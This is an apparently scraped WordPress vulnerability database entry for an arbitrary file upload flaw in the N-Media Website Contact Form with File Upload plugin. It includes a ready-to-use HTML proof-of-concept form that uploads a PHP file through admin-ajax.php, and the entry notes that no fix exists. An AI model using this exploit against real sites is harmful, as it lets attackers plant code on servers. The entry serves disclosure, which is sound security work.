N-Media Website Contact Form with File Upload – Arbitrary File Upload | Plugin Vulnerabilities

Description

The website-contact-form-with-file-upload WordPress plugin was affected by an Arbitrary File Upload security vulnerability.

Proof of Concept

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_webcontact_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Affects Plugins

website-contact-form-with-file-upload

No known fix

References

URL

https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-website-contact-form-with-file-upload/

Miscellaneous

Submitter

Claude Godlewski

Verified

No

WPVDB ID

7af540b0-fc82-4dfd-8050-d70f0a4ab470

Timeline

Publicly Published

2016-09-19 (about 9 years ago)

Added

2016-09-21 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2014-08-01

Title

Sixtees - Shell Upload

Published

2026-03-03

Title

Lendiz < 2.0.1 - Authenticated (Subscriber+) Arbitrary File Upload

Published

2014-08-01

Title

Foxypress 0.4.1.1-0.4.2.1 - Arbitrary File Upload

Published

2014-08-01

Title

appius - Arbitrary File Upload

Published

2024-04-05

Title

Church Admin < 4.1.6 - Authenticated (Subscriber+) Arbitrary File Upload